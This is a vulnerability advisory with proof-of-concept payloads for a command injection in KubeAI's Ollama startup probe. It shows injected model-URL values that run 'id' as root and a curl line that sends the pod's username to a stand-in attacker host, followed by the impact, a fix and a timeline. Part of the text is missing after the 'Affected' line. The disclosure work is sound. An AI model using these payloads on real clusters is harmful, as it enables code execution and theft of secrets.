## https://sploitus.com/exploit?id=B13F4FEE-2B3C-5AF8-A171-2FC9D2733ABC
# CVE-2026-34940 โ OS Command Injection in KubeAI via Model URL in Ollama startup probe
**Severity**: High (CVSS 8.7)
**CWE**: CWE-78 โ Improper Neutralization of Special Elements used in an OS Command
**Affected**: `github.com/kubeai-project/kubeai` /tmp/pwned;echo"
```
Generated startup probe:
```bash
/bin/ollama pull registry.example.com/model;id>/tmp/pwned;echo && \
/bin/ollama cp registry.example.com/model;id>/tmp/pwned;echo poc-cmd-inject
```
The `id>/tmp/pwned` runs and writes `uid=0(root)...` to `/tmp/pwned` inside the pod.
**Vector 2 โ `?model=` query parameter (OOB exfiltration):**
```yaml
url: "pvc://my-pvc?model=qwen2:0.5b;curl${IFS}http://attacker.com/$(whoami);echo"
```
Generated probe:
```bash
/bin/ollama cp qwen2:0.5b;curl${IFS}http://attacker.com/$(whoami);echo poc-cmd-inject-pvc
```
Exfiltrates the pod's username to an attacker-controlled server.
---
## Impact
1. **Arbitrary command execution** in model server pods for any user with `Model` CRD RBAC
2. **Privilege escalation path in multi-tenant clusters** โ a restricted tenant can execute code in pods, access mounted secrets and service account tokens, and potentially move laterally
3. **Environment variable exfiltration** โ API keys, credentials, and cloud provider tokens mounted in the pod
---
## Fix
Replace `bash -c ` with an exec-style probe passing arguments as an array (as the vLLM engine already does), or validate the URL fields against `^[a-zA-Z0-9._:/-]+$` before interpolation.
---
## Timeline
- **Discovery**: 2026-03-xx
- **Reported**: GHSA private advisory
- **CVE published**: CVE-2026-34940